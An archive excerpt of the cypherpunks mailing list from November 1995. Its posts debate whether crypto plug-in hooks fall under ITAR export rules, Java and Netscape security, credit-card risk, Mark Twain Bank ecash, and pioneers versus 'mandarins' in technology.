Message-ID: <199511162113.QAA08492@universe.digex.net>

jim bell writes:
>>jim bell writes:
>>>>I think it's 121.1, Category XIII paragraph (b) item (5):
>>>>"Ancillary equipment specifically designed or modified for paragraphs (b)
>>>>(1), (2), (3), (4) and (5) of this category;"
>>>
>>>Question: What makes computers in general NOT describable by such a
>>>paragraph?!?
>>
>>The referenced paragraphs describe cryptographic hardware, software and
>>technical data. Computers in general are not "specifically designed"
>>as cryptographic equipment.
>
>Great! Then you must merely ensure that there is at least one
>(non-encryption) program around that can use the same hooks.

The problem is that the non-encryption program must use the same
interface as the encryption program. Text compression is often cited
as an example of a non-encryption program that can use the same hooks
as a compression program, but there's a key difference: the text
compressor *doesn't* need a key.

The encryption tool would have an interface like

    Boolean (*)( DataSource, DataSink, void*);

A compressor written to the same interface would never need to touch
that third argument. Therefore, the second argument is "specifically
designed" to permit an encryption tool to be used.

You'd need a program which not only *accepted* the additional
parameter, but also *needed* the second parameter. I confess I have
some difficulty thinking of one.

From mrm at netcom.com Thu Nov 16 16:46:45 1995
From: mrm at netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 08:46:45 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <9511162108.AA08466@all.net>
Message-ID: <199511162123.NAA06232@netcom20.netcom.com>

Hi Dr Cohen -

I work for Sun, and I don't speak for Netscape!

I do my best to post messages that are accurate and that can be
substantiated, but that is not the same as being an official
spokesperson.

I think reasonable people can disagree on the dangers of postscript
interpreters. I do not dismiss your concerns - I was merely pointing
out that the fix may be simply not to run a postscript interpreter.
That decision is made by a user, not by a web browser.

Marianne
Java Products Group (this is the name of the Java group at Sun)
Sun Microsystems, Inc.

From ac at hawk.twinds.com Thu Nov 16 16:50:49 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Fri, 17 Nov 1995 08:50:49 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511161848.KAA06931@netcom3.netcom.com>
Message-ID:

Vladimir:

Calm down. This is why I started my post with "Maybe this is stupidly
obvious question but....."

I am trying to illustrate some simple points and ask some simple questions:

1. Risk to a cardholder is on a vastly different scale than risk to the
Bank Consortiums that run the credit card business. Charge offs and fraud
are of course as you point out a cost of doing business. If it is not an
acceptable risk to the card holder and the bank it won't happen. The bank
won't deploy a system that they view as exposing them to unacceptable
loss. The cardholder will not use a system that offers him no recourse
to recover losses. End of Story.

2. The Bank Consortiums are doing a poor job of explaining to cardholders
merchants and developers such as you and me that are supposed to implement
these "open" specs exactly *what* our risks are in developing and
deploying these systems on our servers. The bank consortiums will have
contracts or usage agreements governing the clearing of transactions in
cyberspace.
When a loss is claimed by a cardholder, how will the loss (if
there is one) be allocated between the cardholder, merchant, the company
operating the server that processed the credit card and the bank be
allocated.

3. I'm getting tired of seeing posts this list about what is more
dangerous cyberspace or restaurantspace. Let's focus on the real
mechanics of how the ground rules of credit card clearing will operate in
cyberspace. The credit card consortiums can advance the cause of
electronic commerce by stating in unambiguous terms what their views are of
these ground rules. Developers, cardholders and merchants can then make
a judgement on whether those risks are acceptable to each party
respectively.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from ."

From attila at primenet.com Fri Nov 17 08:56:00 1995
From: attila at primenet.com (attila)
Date: Fri, 17 Nov 95 08:56:00 PST
Subject: e$: Mandarins, Lifers, and Talents
In-Reply-To:
Message-ID:

one point to add to the discussion of pioneers, "evangelists" and
"prophets" in this thread:

1. they were all ahead of the curve --yes, they were visionaries.
almost all were pushed aside as it became a "business."

2. most were pioneers: a specific example is Bob Norris who walked
out of a Fairchild board meeting being rejected for his
eighth try at replacing Germanium because the first seven had
failed. A couple of VCs, among them Arthur Rock and Bob Perring
said: "...we believe you, let's try silicon..." and we have Intel.

But, who drives Intel today? --Grove, who is labelled as the
founder. Grove made the _business_ -the brains have been
forgotten. Norris was the darling of the VCs for a couple years
until they figured he couldn't spot a _financial_ success.

This same scenario was repeated at Apple, and hundreds of others.
Grove was an exception to the rule that the startup management, quite often including developers, is replaced by plain vanilla suits. Why even the evangelistic and prophetical developers? --because they don't deviate from their vision to comply with the solely profit oriented modes of the new marketeers.

I look at it this way: our nation runs on _money_, whether we like it or not (I don't). Money for the sake of money is evil money as it gives nothing in return, particularly when everything is to be produced as cheaply as possible for more profit to the money folks. Reminds me of two excellent quotes from John Ruskin:

"He who buys for price alone is this man's lawful prey."

"The price of oats is significantly lower after processing by the horse."

I write code because I enjoy it -even it is addictive.

flick

-------------------------------------------------------------------------

On Thu, 16 Nov 1995, Robert Hettinga wrote:

> >It really did not happen because of cheerleaders. This is a recurring
> >belief of mine, notably in my occasional interactions with the nanotech
> >community, as a few members of this list can attest to. The "Rah, Rah"s--no
> >pun intended--play a minor role in adoption of new products and
> >technologies.
>
> Tim, you can't tell me that there weren't people who were just plain fired
> up about the prospects for any really serious technology. Where are you
> living, the Gernsback Continuum? Tim, those "cheerleaders" are the ones who
> either get fired up to do something themselves, or if they can't, they get
> people either fired up to buy stuff, or fired up to build stuff. Howard
> Hughes was one. Hell, the Wright brothers were. So are you, Tim, only your
> passion is strong crypto and cryptoanarchy. Mine is this geodesic market
> stuff...
>
>
> >One argument I am never persuaded by is the hackerish "Feh." (Does anybody
> >but hackers use this strange word?)
>
> Ah. Well, Tim, "Feh" is yiddish, actually.
Just like "hacker" comes from
> electric trains. If you don't believe me on *that* one, ask Mr. Levy, who
> knows all about the MIT Model Railroading Club...
>
> >In any case, I'm not interested in "doing better than that." My support for
> >Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
> >Money, or E-Purse, or Digibux, or whatever, well, I'm not a merchant. Just
> >as one could study flight, to use Bob's example, without operating a
> >passenger service or a flying school, so one can be interested in digital
> >cash without "opening an account."
>
> Right on, Tim. Just don't rain on my parade, or anyone else who's trying to
> make something happen, for that matter.
>
>
> >Ah, but I never claimed otherwise (perhaps this is what you mean by "your
> >nonexistent point"). My point was only that digital cash will happen mostly
> >when it fills a need, or is accepted by customers, not by cheerleading and
> >by urging people on this list to be pioneers.
>
> Cart before the horse, Tim. Most of the new people (say, for 2 years at
> least) on this list *are* pioneers. I've got 600 people over on www-buyinfo
> who are there primarily because 90% (!) of the traffic on it is my
> e$-filtered cross-posts from cypherpunks, and I don't know how many are
> over here because they like their whiskey neat. Those people are so fired
> up, they will find a need, or *create* one, if they have to.
>
> >The theories about mandarins, lifers, and talents I'll discuss at another
> >time, maybe. All I'll say is that I think it's too simple a categorization.
> >Maybe it's a Boston viewpoint.
>
> Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces,
> Corpus Christi, El Paso, Anchorage, St. Louis, Mid-MO, Chicago, and yes,
> Boston. Never knew I was one until you told me...
>
> >The folks I've worked with over the years
> >bear almost no resemblance to any of these categories.
>
> Typical Mandarin response. ;-). (just pulling your leg, Tim.
Put the Glock
> *down*...)
>
> >In any case, people
> >will start using digital cash if and when it fulfills some need, or some
> >need they never knew they had, gets stimulated.
>
> Agreed.
>
>
>
> >On a personal note--which is weird, since 1000 or more people may be
> >reading this message, though most probably haven't read this far--I think
> >it best not to get too emotionally attached to some particular outcome in
> >the introduction of a new technology.
>
> I bet they are, but I'm not attached to Mark Twain or even Digicash per se.
> It just seems to me, that if you want to get involved in this flying stuff,
> here's a plane that flies, even if its elevators are stuck on the front.
> Learn to fly now, and be able to fly the new stuff as it becomes available.
> If you want to fly, that is. Some people then couldn't help it. They *had*
> to do it. That's what's happening here, Tim.
>
> >I've seen many "prophets" wailing to the world that their
> >visions _deserve_ success.
>
> Not here Tim. I believe you might be projecting, or something. I just want
> to sell stuff for cash on the net. Then, I want to surfact the financial
> markets into little tiny pieces...
>
> >The technologies which hit the right chord rarely need, or benefit from,
> >the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or
> >any of the other so-called evangelists to succeed. The microprocessor did
> >not evangelists. The airplane did not. The VCR did not. The cellular phone
> >did not.
>
> I don't believe that for a minute, and on reflection, you probably don't
> either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake.
> Think about, oh, the Sony guy, whatever his name is, Morita. The people who
> built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed.
> What about the *entrepreneur's* reality distortion field.
I bet you've seen
> more than a few, and probably more than a few who were right, or you
> wouldn't be thrashing your Mac on the net and clipping coupons...
>
>
> >And I can think immediately of several
> >technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
> >Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
>                                                                 ^^^^^
> >enthusiasts--but in which progress has been stalled or proceeded along
>  ^^^^^^^^^^^^
> >different paths for different reasons.
>
> I resemble that remark. Sure, Tim some of them didn't make it. But for
> every one of those (strange you should mention Jobs, right after I mention
> the reality distortion field, and don't count him out yet, rumor has it
> Ellison wants him to run Apple when Oracle buys it, god help us all), there
> are others who did exactly that. Von Braun, or Porsche, or, hell, all I can
> think of are germans, uh, okay, Bill Gates.
>
> >This is a very interesting area for me, and I used to write extensively
> >about it. Nick Szabo and I had several debates about this, a couple of
> >years ago. However, no time now to discuss the full implications here.
>
> Having been hammered by Nick myself, once or twice, I think I understand this...
>
> So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets
> enthusiastic about all this on my account, and puts up the king-hell,
> world-beater, financial-cryptography-killer-ap that's cool by me.
> Otherwise, it's only bandwidth, which I've wasted enough on for this
> thread. If you want to make the rubble bounce, go for it.
>
> Besides, I usually stay in my cage, these days. Which is where I'm going to
> go and lurk for another month or so...
>
> Cheers,
> Bob Hettinga
>
> PS: Feh
>
> -----------------
> Robert Hettinga (rah at shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
> "Reality is not optional."
--Thomas Sowell
> The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
> >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<
>
>

From rah at shipwright.com Thu Nov 16 16:58:52 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 08:58:52 +0800
Subject: e$: Mandarins, Lifers, and Talents
Message-ID:

>Bob, let me do a minor vent here.

Fine, Tim. Vent away. In a minor key, even.

>You are critical of E. Allen Smith's viewpoint, and essentially question
>whether he has anything to sell. Not much of an argument.

It's a damn good argument, which I'll get to in a minute. It was just done rudely, and for that I apologise to the list. What I got was a reactionary flame which had nothing to do with the (admittedly flag-waving) post I put up, which I should have ignored, but instead I responded with a reactionary flame of my own, which got me a reactionary flame from a Senior Member of the List, one with Maximum Reputation... It has been ever thus, for those of you who've been around here since I showed up a year ago last April. I just can't seem to color inside the lines, as far as Dr. May is concerned.

>1. I'm not selling anything, and won't sign up just for "moral support."

I believe that was my point, Tim. You're *not* selling anything. I was sending a message to people out there who *are*. People who are, or are going to, use non-certificate payment methods, like credit cards, and who, if they're subscribed to this list, should be clueful enough to do this and know why they should do it. Besides that, it's free. Until Friday. ;-).

>2. I wish Mark Twain Bank well, but the success of the kinds of digital
>cash we hope to see will not likely hinge on the success of one particular
>operations, such as MTB.

Nope. But if people completely ignored the Wright Brothers, would Curtiss have entered the market? (An interesting example, as the Wrights sued Curtiss for patent infringement and lost, I think.)

>3.
The success of BankAmericard (later renamed Visa) came when real
>customers and real shops started to use it, not when early pioneers set
>themselves up as clearinghouses and whatnot.

I am talking about real shops. With real customers. I bet you haven't even looked at the list of shops yet. What I'm planning to do is to offer subscriptions and sponsorships of the e$ lists we're putting up on an ecash server. Putting my money where my mouth is. Literally.

>I have more interesting things to do, personally, than to be a pioneer so I
>can then have nothing to sell, and little to buy....when "interesting
>markets" start to appear, I'll look at it again.

This is a straw man, Tim. Actually, it's post hoc. "If we had some ham, we could have some ham and eggs, if we had some eggs." or, "If we lived here, we'd be home now." Feh. You can do better than that. I've seen you do it.

But, to answer your nonexistent point, yes, people *are* starting to sell things on the net. We know that the best way to do that in the long run is with cash, and with other digital bearer certificate technologies. Not just because these methods are secure. Not because they allow anonymity. They're just starting to, and when they've been accepted in the market, they will be nothing else but. All we need is a scenario where the digital cash underwriter relies upon the ATM system for validation of identity, and the second an anonymous bank account uses the underwriter, we have totally anonymous digital cash. We're very close here.

>But when you urge people to be pioneers, and they express reservations or
>doubts about the system, attacking their motives or implying they have
>nothing to sell anyway is not too helpful.

Yes. it was rude. I apologise both to the list, to Dr. May, and to (soon to be Dr.) Mr. Smith. Mostly for stopping discussion with a thinly veiled insult.

>Just my views, but, then, I don't have any customers either.

Which brings me to my real point, here.
Why I used an informal fallacy of my own, and lashed out with an ad hominem attack against someone with an .edu domain on their e-mail address, after they dissed something I think is a good idea, at least for a start.

So, why did I do this? I didn't understand it at the time, but it's probably class warfare. :-).

I just heard something on an NPR(!) talkshow with a guy talking about his book about the three power group of american culture. It used to be what he called the "episcopacy", the Groton-Harvard-State Department types who ruled both government and the guts of American business until say, the depression and World War II. These people were there primarily because their families were there. They were "the nice people of Boston" that Rose Kennedy had so many problems with. In 1953, say, it may interest you to know, that the standardized test scores for Harvard were the same as those for the population at large. George Bush was one of these, but so was FDR.

Nowadays, this guy says, (I can't remember who he is, but he wrote a book about it, so we'll find out soon enough), we have *three* power elites in this country.

The first class is the class he called the "mandarins". These people have inherited most of the trappings, and titles, of the old episcopacy. These are people who tested well, who were typically plucked from obscurity to go to the best schools, and go on to places like Harvard, where the scores are now way above average, and is now pretty much pure meritocracy as far as admission is concerned, political correctness aside. Mandarins go on to get advanced degrees. Camille Paglia, Milton Friedman, Carl Sagan, Billary Clinton are all mandarins. This is good. The best and the brightest get the best educations. They're also the people who start things like the Viet Nam war, and the welfare state.

The second class are the "lifers". These people who go to state schools, get uninspired grades, and spend their working lives in the same institution.
Colin Powell, most Fortune 500 CEOs circa 1983, Lyndon Johnson and Bob Dole are lifers.

The third class are "talents". Newt, and Edison, and most computer or internet entrepreneurs are talents, especially if they have no formal computer science training except what they taught themselves.

Like any set of categories, nobody is exclusively one class or another, except that credentialism has allowed mandarins to capture the cultural flag for the time being. Einstein and Whit Diffie are talents who got mandarin credentials. Richard Stallman is a talent who will probably get mandarin credentials posthumously.;-). Bill Gates is a proto-mandarin who figured out he was a talent. Sloan was a talent with mandarin credentials who created a whole industry full of lifers.

Pioneers tend to be talents, Tim. They tend to talk in generalities, and not color between the lines. They tend to make up rules as they go along, and sometimes, like Mr. Bill, they create rules the rest of us have to follow whether we want to or not.

One of my messier theories about the internet is that it was invented by mandarins. Now the talents, the people you call pioneers, have moved in, and they're much more pragmatic, and have little patience for crystalline perfection, because inefficiency and chaos is where they find beauty, joy, and all those other nasty imprecise concepts. When things settle down a bit, the lifers will come. They're trying to do it now, by building sites like www.time.com, or buying into sites like www.wired.com.

Even though you're an iconoclast, Tim, I couldn't help but think of you and the proto-Dr. Smith as mandarins when I got your response to my post. I was trying to shout over your heads to all the talents out there trying to make money on the net. Even though you may think of yourself as a mountain man -- or maybe a cowboy -- watching the settlers come, I feel more like I've upset the decorum by hollering in the faculty tea room.
Having embarrassed myself that way, I'll try not to do it again. Because, oddly enough, we need each other.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From aleph1 at dfw.net Fri Nov 17 08:58:54 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 17 Nov 95 08:58:54 PST
Subject: SA: Confidential Communication on the Internet
In-Reply-To: <199511171627.LAA17236@fuseki.aa.ans.net>
Message-ID:

No I think you did. The main point I guess was that their system accomplished authentication, as well as privacy. But like I said lite on the technical side. And I agree, it spent more time talking about what is encryption, public keys exchange, and certificates, than answering what's different in their system than any of the others out there.

On Fri, 17 Nov 1995, michael shiplett wrote:

> This seemed to be a duplication of an X.509 certificate hierarchy:
> ``Hey, I don't know who you are but you have a seals which go back to
> a CA I trust.'' In this respect the information seemed unworthy of an
> article in SA.
>
> Perhaps I did not read the article closely enough?
>
> michael
>

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From rsalz at osf.org Thu Nov 16 17:09:25 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 17 Nov 1995 09:09:25 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511162235.AA18129@sulphur.osf.org>
Status: R

>as a compression program, but there's a key difference: the text
>compressor *doesn't* need a key.

Sure, 12 14 16, etc., bits as in the classic unix compress program.
>The encryption tool would have an interface like
> Boolean (*)( DataSource, DataSink, void*);
>
>A compressor written to the same interface would never need to touch
>that third argument. Therefore, the second argument is "specifically
>designed" to permit an encryption tool to be used.

Not at all. copying inbuf to output is a common practice, it's quite rare that you often compress in-place.

/r$

From Andrew.Spring at ping.be Thu Nov 16 17:15:46 1995
From: Andrew.Spring at ping.be (Andrew Spring)
Date: Fri, 17 Nov 1995 09:15:46 +0800
Subject: Public Domain?
Message-ID:

>But the researchers backed out of the idea on the advice of our patent
>lawyers. The reasoning goes like this: Sending anything over the Internet
>is equivalent to placing it into the public domain, since the message can
>be viewed by other than the intended recipient. So, proprietary
>information *even encrypted* will be rendered unpatentable if sent over the
>Internet.
>

You may want to send these guys back to do their homework. For corporate communications, crypto is not new. Messages have been sent in cipher over telegraph lines since the civil war. Ask if a trade secret becomes exposed (in the legal sense) if it is transmitted over telegraph lines in code.

I fail to see what the difference is between enciphering something in dots and dashes and enciphering it in 1's and 0's.

From fluffy at shout.net Fri Nov 17 09:21:33 1995
From: fluffy at shout.net (Chris Stillson)
Date: Fri, 17 Nov 95 09:21:33 PST
Subject: Crypto++ port for Macintosh
Message-ID: <199511171701.LAA30608@duracef.shout.net>

I have started to port your crypto++ libraries to mac, using metrowerks. I was just wondering if you would like a copy of it when I'm finished? All in all, a very interesting set of classes.

Chris

From mark at unicorn.com Thu Nov 16 17:25:44 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 17 Nov 1995 09:25:44 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID:

On Thu, 16 Nov 1995, Scott Brickner wrote:

> You'd need a program which not only *accepted* the additional parameter,
> but also *needed* the second parameter. I confess I have some difficulty
> thinking of one.

How about command-line compression options. Gzip, for example, allows you to specify how good you want the compression to be, with better compression taking longer. So you could justify passing a set of options to the compression algorithm, which could also be used to pass key information to the encryption algorithm.

In fact, you could pass in a void * pointer to options that had been set up in a preferences panel in the application, which would be provided by the plug-in compression or encryption code. That structure could then have anything you wanted in it.

Also, I'm not sure you'd need to pass a key, surely the encryption code could do all the key-handling itself?

Mark

From dreschs at mpd.tandem.com Thu Nov 16 17:30:39 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Fri, 17 Nov 1995 09:30:39 +0800
Subject: credit card conventional wisdom (fwd)
In-Reply-To:
Message-ID: <199511162204.QAA02889@galil.austnsc.tandem.com>

"Vladimir Z. Nuri" said:

>> Card Imprints taken with no online authorisation are typically
>> charged a transaction fee of 3-6%: with authorisation, 1.5-3%. ATM
>> card transactions are charged at around $0.10 per transaction.

VZN> are you saying that a typical mail order credit card transaction
VZN> has a 3-6% charge, because the card is not physically present?

No, s/he was talking about merchants who verify that you have the credit available (online authorization) vs those who trust you to have it (no online authorization). As I understand it, the fee is 'insurance' that the merchant will be paid - as long as there is no fraud on the part of the merchant, it will receive payment, even if the charge was invalid, because the card was canceled/stolen/over limit/etc.
The lower charge for online authorization is because when the charge comes back approved, the CC company is able to verify that the credit is there. This isn't foolproof (2 separate charges, each under the available credit, can be approved even if the total exceeds the available credit), but it's more than the offline merchants can do.

--
#include /* Sten Drescher */
To get my PGP public key, send me email with your public key and
Subject: PGP key exchange
Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3

From jya at pipeline.com Thu Nov 16 17:39:25 1995
From: jya at pipeline.com (John Young)
Date: Fri, 17 Nov 1995 09:39:25 +0800
Subject: GHO_mac
Message-ID: <199511162229.RAA29474@pipe8.nyc.pipeline.com>

The Sciences, November/December, 1995

Another realm of explosive population increase is in cyberspace, a phenomenon taken up in this issue with Sherry Turkle's "Ghosts in the Machine." Here the growth comes about not only in the traditional way but also in wildly non-traditional ways. People multiply themselves on the Internet, grafting various aspects of their personalities onto distinct characters. Even more unsettling, as Turkle wittily documents the matter, is that the Net is populated with "bots": robot sentence-parsing engines that can do fair impersonations of real people, often well enough to (provisionally) pass Alan M. Turing's test for machine consciousness. Do you really know who -- or what -- you're talking to?

The future of all this is murky and mind-boggling: Information-seeking bots even now can tie up sites on the World-Wide Web. Bots impersonating people share chat groups with other bots, much the way telephone answering machines now "talk" to each other.
Internet chatter gets so dense that bandwidth and other Net resources become strained: the site at the Los Alamos National Laboratory now (automatically) warns robots away with a chilling threat to "initiate automated 'seek and destroy' " action against the machine from which the robot seems to be launched. A conservative reaction may already be setting in, determined to have users identify, encrypt and authenticate every packet of information they send across the Net. Net fatigue becomes a recognized medical syndrome; Net detox centers spring up; Net warfare breaks out; Net starvation becomes a recognized social problem; Net demagogues undermine local democracies.... How many people can the Net support?

-- Peter Brown, Editor

-----

For "Ghost in the Machine" by Sherry Turkle, a professor of the sociology of science at the Massachusetts Institute of Technology. The article is adapted from her forthcoming book, *Life on the Screen: Identity in the Age of the Internet*, which is being published in November by Simon & Schuster:

GHO_mac (16 kb) ... later this evening, that is.

From wiltship at iccu6.ipswich.gil.com.au Thu Nov 16 17:41:46 1995
From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Fri, 17 Nov 1995 09:41:46 +0800
Subject: Need advice on video
Message-ID: <199511162222.JAA05710@iccu6.ipswich.gil.com.au>

-----BEGIN PGP SIGNED MESSAGE-----

Ben wrote...

>What I'm fishing for here are any suggestions for ways to present
>some of this content in an interesting video setting. We've already
>decided on doing some algorithm animation, and maybe some simple
>moving graphics illustrating the various protocols. Any ideas you
>might have would be appreciated.

Firstly you will need to clearly define for yourself exactly what you want the audience to know by the end of the programme... the content. And what you want them to feel by the end of the programme too.. you obviously want them to have positive feelings about crypto.
You might also consider some broader political issues to be cleanly interwoven through the script too.

Then, you might like to think about the WHO, WHEN, WHERE and WHY of crypto. A bit of an historical background on cyphers would put today's crypto into context, too.

Make sure that you keep giving the audience enough knowledge to comprehend stuff you will be presenting towards the end of the video... all of the information you present needs to build on what you have already presented.

Closely examine your scripts for jargon. Take out any that you can't explain clearly. Too much jargon can swamp the audience and they will be distracted from important content while they try to remember what a particular word means.

>BTW, once we finish this and show it locally, we are considering
>doing some duplication to send out to interested bodies. Do you
>think there is demand for a good, clear intro to all this in video
>form?
>

I'm sure there is a need for this sort of programme that is produced well and is reasonably priced. Remember to get signed releases from EVERYONE involved in the project, not just ppl on camera, so you can sell the programme ANYWHERE IN THE WORLD if you choose to.

Don't be misled, I'm sure there are quite a few programmes out there on this very topic. Yours needs to be significantly different and entertaining. I would suggest you have an opportunity to make a video from 'the inside', given the ppl on this list and the contacts they have.

A lot of films are good introductions to a subject without standing up and calling them such... like if I was making a video about Phil I would have to explain crypto and its use as a way of reaching a level of understanding for the audience.

Hope this is of some help.

>Thanks,
>--
> eebmoC .L nimajneB | Benjamin L.
Combee (REVERSE)
> gro.doowhcet at eebmoc | combee at techwood.org (ENGINEERING)
>\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/ (RESERVE)
>

Cheers
Peter

Flight to Quality
Wiltshire Productions Pty Ltd
Brisbane, Queensland, Australia
Intl Voice 61 7 3376 3535
Intl Fax 61 7 3279 4027
Email wiltship at gil.com.au
PGP Key ID 3E584C7D
PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10

From wilcoxb at nagina.cs.colorado.edu Thu Nov 16 17:43:30 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Fri, 17 Nov 1995 09:43:30 +0800
Subject: Mark Twain Bank ecash scripts needed
Message-ID: <199511162325.QAA16375@nagina.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I am in the process of setting up a shop using Mark Twain Bank Ecash. Could someone please forward me the scripts to accept Ecash (running on SunOS. On c2.org actually) and/or any advice you have about how to expeditiously implement a shop?

I am about to fax MTB the agreement form, so I should get information from them "within 24 hours", but that is cutting it awfully close to the Friday deadline for the US$300.00 fee waiver.

Many thanks!

Bryce

signatures follow

"To strive, to seek, to find and not to yield."
bryce at colorado.edu

From Matthew.Sheppard at Comp.VUW.AC.NZ Thu Nov 16 17:47:26 1995
From: Matthew.Sheppard at Comp.VUW.AC.NZ (Matthew James Sheppard)
Date: Fri, 17 Nov 1995 09:47:26 +0800
Subject: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <199511162130.KAA04423@paramount.comp.vuw.ac.nz>

The shadowy figure took form and announced "I am "Perry E. Metzger" and I say . ..

> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release. Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting. Netscape has been shipping the fixed
> > applet security model for over a month(since 2.0Beta1)...
>
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like.

Well beta2 is heaps better than beta1, I can still crash beta2 with or without java under win3, sgi, solaris and alpha but it has to be used for longer and few crashes are repeatable. Plus lots of new gizmos, the certificate authority interface (thanks Jeff).

I've got to note just one thing -- what about the Netscape LiveScript language? is it opening up the same security can of worms as java? I realise that it provides functionality specific to browsing only (no network/files) but the potential for bugs when you add another language must increase.
--
|~ |~ |~ o| o| ('< o| ,',) ''<< ---""---

From awestrop at nyx10.cs.du.edu Thu Nov 16 17:48:30 1995
From: awestrop at nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:48:30 +0800
Subject: Q: blind maildrop anyone?
In-Reply-To: <199511161409.JAA08809@polyphony.sw.stratus.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> What I'd like to do is: establish an email account, other than the one I'm
> posting from; preferably on some free email/homepage box, that would encrypt
> all cleartext email to hit that account for me at this account. I have tried,
> unsuccessfully to establish this at c2, which offers this service.

> My question: has anyone done this successfully at c2, or another location,
> and be willing to point me in the right direction to accomplish this.

You could telnet to nyx.cs.du.edu and set up an (optionally pseudonymous) free account. I've installed a perl script (posted to this list by George Magiros) that automagically encrypts a user's incoming email by piping it through pgp 2.6.2. To use it, create a .forward file consisting of the line:

"| /nyx/user/bin/privacy "

This is far less effective than Sameer's c2 system, but it's simple enough for net.novices to use. You can retrieve your encrypted email via telnet, ftp, or an offline mail reader that has hooks for pgp and works with mail packets created by uqwk, which is also installed here.
Alan Westrope __________/|-, (_) \|-'
2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

From awestrop at nyx10.cs.du.edu Thu Nov 16 17:52:58 1995
From: awestrop at nyx10.cs.du.edu (Alan Westrope)
Date: Fri, 17 Nov 1995 09:52:58 +0800
Subject: Denver area meeting, SUNDAY, Nov. 19, 2 pm
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Once again, we'll begin in the basement of the Tivoli, at downtown Denver's Auraria Campus, and perhaps wander elsewhere. Drop me a note if you need directions or more info.

Alan Westrope __________/|-, (_) \|-'
2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

From cassiel at alpha.c2.org Thu Nov 16 18:04:46 1995
From: cassiel at alpha.c2.org (Cassiel)
Date: Fri, 17 Nov 1995 10:04:46 +0800
Subject: The Great FAQ Hunt
Message-ID: <199511162319.PAA24869@infinity.c2.org>

Several fellow newbies have written me asking to share the sources I received re: where to get the uncorrupted Cypherpunk FAQ (Cyphernomicon). You can get it uncompressed-- along with a lot of other cool stuff, like the Applied Crypto book--at Pat Farrell's Web Site (thanks, Pat!)

http://www.isse.gmu.edu/~pfarrell/crypto.html

However, when I tried to summon up this 1.2 MB tome with Netscape, my computer choked.
Changing the cache settings didn't seem to help, so I wound up downloading it via FTP from ftp.netcom.com /pub/tc/tcmay where you can also get your hands on the shorter MFAQ (Most Frequently Asked Questions). Hope this helps. I'm on an info-diet, Cypherpunk Lite, so if you want to respond to this message, please be sure to "cc" me directly. Cassiel From sameer at c2.org Thu Nov 16 18:12:46 1995 From: sameer at c2.org (sameer) Date: Fri, 17 Nov 1995 10:12:46 +0800 Subject: e$: Come aaaannnndddd Get it! In-Reply-To: Message-ID: <199511162357.PAA28293@infinity.c2.org> Donations are also possible through the remailer interface at http://www.c2.org/remail/by-www.phtml and https://www.c2.org/remail/by-www.phtml Once you send a message you'll be prompted if you want to pay for the service you just used. > > Although Private Idaho will always remain free, to encourage Ecash use, > my Web page will support "donations." The initial merchant list sounds > like it's going to be a subset of this list. Time to go add the Mark > Twain links to the page. This is going to be fun... > > Joel McNamara > joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key > Thomas Jefferson used strong crypto, shouldn't you? > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From ses at tipper.oit.unc.edu Thu Nov 16 18:23:54 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 17 Nov 1995 10:23:54 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: 